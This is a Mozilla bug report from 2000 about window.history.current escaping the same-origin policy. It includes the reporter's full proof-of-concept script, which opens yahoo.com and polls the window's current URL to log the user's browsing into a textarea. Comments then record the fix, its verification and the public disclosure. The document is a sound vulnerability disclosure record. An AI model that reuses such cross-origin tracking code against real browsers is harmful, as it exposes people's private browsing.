window.history.current allows tracking user's browsing

VERIFIED FIXED in M16

Status

()

Core
Security
P3
normal
VERIFIED FIXED
18 years ago
18 years ago

People

(Reporter: Norris Boyd, Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
x86
Windows NT
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [nsbeta2+])

Attachments

(1 attachment)

(Reporter)

Description

18 years ago
Subject: 
        BUG: window.history.current allows tracking user's browsing
   Date: 
        Tue, 02 May 2000 15:45:02 +0300
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




window.history.current is not protected by Same Origin security policy
and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
a=window.open("http://www.yahoo.com");
function checkStatus()
{
 current=a.history.current;
 if (current != "" && current != last) 
  {
    last = current;
    document.forms[0].elements[0].value += current + " ";
  }
}
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------


Reading links using window.history.current 
window.history.current is not protected by Same Origin security policy and that 
allows tracking user's surfing. 
Follow some links in www.yahoo.com and see them in the TEXTAREA bellow.
(Reporter)

Comment 1

18 years ago
Created attachment 8206 [details]
Test case
(Assignee)

Comment 2

18 years ago
Need to double-check call to same-origin, check default policy. I think I can
take care of this one.
(Assignee)

Updated

18 years ago
Target Milestone: --- → M16
(Assignee)

Comment 3

18 years ago
Marking nsbeta2.
Status: NEW → ASSIGNED
Keywords: nsbeta2

Comment 4

18 years ago
Putting on [nsbeta2+] radar for beta2 fix. 
Whiteboard: [nsbeta2+]

Comment 5

18 years ago
Changed QA contact to Cathy.
QA Contact: junruh → czhang
(Assignee)

Comment 6

18 years ago
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 7

18 years ago
Yes, It is fixed.
Status: RESOLVED → VERIFIED
(Assignee)

Comment 8

18 years ago
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.